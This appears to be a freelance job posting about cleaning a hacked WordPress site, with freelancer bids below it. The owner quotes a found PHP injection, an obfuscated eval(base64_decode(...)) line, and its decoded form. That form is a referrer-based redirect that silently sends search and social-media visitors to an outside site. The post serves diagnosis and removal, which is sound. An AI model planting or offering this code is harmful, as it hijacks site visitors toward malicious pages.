Færdiggjort

wordpress virus removal

When I blog on my site [url removed, login to view] (or autopost via "Social Networks Auto Poster" widget) - it posts to my facebook. The shortened code (ex [url removed, login to view] ) leads to a malicious site I believe, ex [url removed, login to view] (oddly, on mobile devices, it correctly goes to my blog).

I am not sure if this is the cause, however a previous person I hired noticed some code that shouldn't be there (in his words). Code is below.

I would like to have the problem resolved, and also know how to prevent future such events from taking place? Below is what I've been told was found:

"I believe your website might have been hacked. There is this type of code (see below) in several of the php files, which is not normally in the wordpress php files… it’s been my experience that when there is something like this .. the website has been hacked. The best I could do is remove all this code, but without fixing the security hole(s) the hackers will likely just put this code back in there. I am just letting you know, so that you can address the issue before it gets worse.

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9xcnVlLnFwb2UuY29tLyIpOwpleGl0KCk7DQp9Cn0NCn0NCn0NCn0="));

com]

I base64_decoded that code it comes out to this (see below) but it basically looks like it might redirecting people to [url removed, login to view] (I didn’t go to this website because it is likely malicious) when they are referred to your website by search engines / facebook / myspace / etc.

error_reporting(0);

$qazplm=headers_sent();

if (!$qazplm){

$referer=$_SERVER['HTTP_REFERER'];

$uag=$_SERVER['HTTP_USER_AGENT'];

if ($uag) {

if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){

if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"[url removed, login to view]")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"[url removed, login to view]") or stristr($referer,"[url removed, login to view]") or stristr($referer,"[url removed, login to view]") or stristr($referer,"[url removed, login to view]") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"[url removed, login to view]") or stristr($referer,"[url removed, login to view]") or stristr($referer,"[url removed, login to view]")) {

if (!stristr($referer,"cache") or !stristr($referer,"inurl")){

header("Location: [url removed, login to view]");

exit();

}

}

}

}

Evner: WordPress

Se mere: yandex-ru, yandex com, wordpress posts not found, stumbleupon com, security networks, referer url php, malicious person, i was referred by, how to auto blog, google yandex ru, google ru, auto aol, aol widget, aol auto com, can you ru it, yandex, wordpress ex, virus remove, search removal, remove virus

Om arbejdsgiveren:
( 5 bedømmelser ) Kanata, Canada

Projekt ID: #4004917

Tildelt til:

bradhaas

Hello, I can solve this problem faster and more effectively than any other contractor here. Please see my private message for more details.

$49 CAD på 1 dag
(14 bedømmelser)
4.6

9 freelancere byder i gennemsnit $126 på dette job

ranganalx

Hi Charles, Good day! This is in response to the original project. Please check PM, I sent response there. Thanks!

$150 CAD på 1 dag
(48 bedømmelser)
5.2
dracco

hello, I've posted in your other project and I can do this job 100% sure. I'm ready to start right away. Best Regards. Dracco

$100 CAD på 1 dag
(43 bedømmelser)
4.9
coolrankit

------ 2YEARS EXPERIENCED PHP, WORDPRESS, CSS & WEB DEVELOPING EXPERT ------ ------ Your SATISFACTION is GUARANTEED with us ------

$100 CAD på 1 dag
(15 bedømmelser)
4.9
tuxadmin

Hi, please see my profile for security related issues. Thank you.

$89 CAD på 1 dag
(25 bedømmelser)
4.6
cloutsoft

Hi, I am expert with over 3 years of experience. I will provide best services. I have fixed such errors in past. Thanks

$150 CAD in 3 dage
(9 bedømmelser)
4.0
aroel

I'm ready to help you on this, please provide me everything so I can deliver this task immediately.....thanks

$175 CAD in 0 dage
(11 bedømmelser)
3.9
easycoder

i am an experienced (mostly wordress) infection cleaner . i will clear your website from all malicious inserts and apply some patches i know to bugs that makes wordpress vulnerable to injection ( usually inside plugin Flere

$120 CAD in 2 dage
(4 bedømmelser)
3.1
amtranslate

please check your private message inbox of the previous application of mine .... thanks for your time Aya

$100 CAD in 0 dage
(0 bedømmelser)
2.0
aboaseel

i can solve ur problem and i will make security system for ur web site to don't hack in future just contact me ....

$200 CAD in 3 dage
(0 bedømmelser)
0.0